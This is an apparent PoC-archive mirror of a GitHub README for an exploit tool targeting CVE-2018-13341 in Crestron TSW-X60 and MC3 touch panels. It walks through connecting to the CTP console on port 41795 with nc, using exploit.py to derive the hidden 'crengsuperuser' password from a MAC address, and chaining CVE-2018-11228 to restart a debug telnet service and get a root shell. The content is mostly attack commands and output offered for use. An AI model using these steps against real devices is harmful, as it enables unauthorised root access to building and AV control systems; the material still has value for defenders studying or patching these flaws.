Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2018-13341 PoC — Crestron TSW-X60和MC3 安全漏洞

Source
https://github.com/Rajchowdhury420/CVE-2018-13341
Associated Vulnerability
Title:Crestron TSW-X60和MC3 安全漏洞 (CVE-2018-13341)
Description:Crestron TSW-X60 all versions prior to 2.001.0037.001 and MC3 all versions prior to 1.502.0047.00, The passwords for special sudo accounts may be calculated using information accessible to those with regular user privileges. Attackers could decipher these passwords, which may allow them to execute hidden API calls and escape the CTP console sandbox environment with elevated privileges.
Description
This Tool Aims to Exploit the CVE-2018-13341
Readme
# CVE-2018-13341
This Tool Aims to Exploit the CVE-2018-13341, By Using the MAC address of the targeted device, you can recover the password of the *"crengsuperuser"* hidden account which has elevated privileges and allow you to run **SUDO** commands.


The Crestron Toolbox Protocol (CTP) can be connected to by accessing port **41795** on the TSW-XX60 device.

```bash
# nc -C w.x.y.z 41795
TSW-760 Control Console

TSW-760> estat

The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
	Link Status ....... : OK
	DHCP .............. : ON
	MAC Address ....... : 00.XX.XX.XX.XX.XX
	IP Address ........ : [removed]
	Subnet Mask ....... : [removed]
	IPV6 Address ...... : [removed]
	Default Gateway ... : [removed]


	DNS Servers ........ : [removed]    | DHCP      |
	                       [removed]    | DHCP      |
```

## Requirements

This tool requires the CryptoGraphy module.

```bash
# pip3 install cryptography
```
**OR**
```bash
# pip3 install -r requirements.txt
```

## Getting Started

```bash
usage: exploit.py [-h] [-m MAC]


# Example
# python3 exploit.py -m aabbccddeeff
[*] Device MAC address: AAXXYYZZ
[*] Password for 'crengsuperuser': somerandompass
```

## Exploiting the CVE-2018-11228

The [CVE-2018-11228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11228) allows unauthenticated RCE via Bash Shell Service in Crestron Terminal Protocol (*CTP*). After getting the password of the *"crengsuperuser"* hidden account you can get a **root** access on the Machine.

```bash
# nc -C w.x.y.z 41795

TSW-760 Control Console

TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************

Service telnetd_debug restarted

TSW-760>
```

Then, in a new shell, you can get **root** access on the box.

```bash
# telnet w.x.y.z

bash# whoami
root
```

```
Credit Goes to : axcheron 
```
File Snapshot

 [4.0K]  /data/pocs/b7bfc8a151a07d67b01766f65a9db381b4ed63fb
├── [1.9K]  exploit.py
├── [1.9K]  README.md
└── [  13]  requirements.txt

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →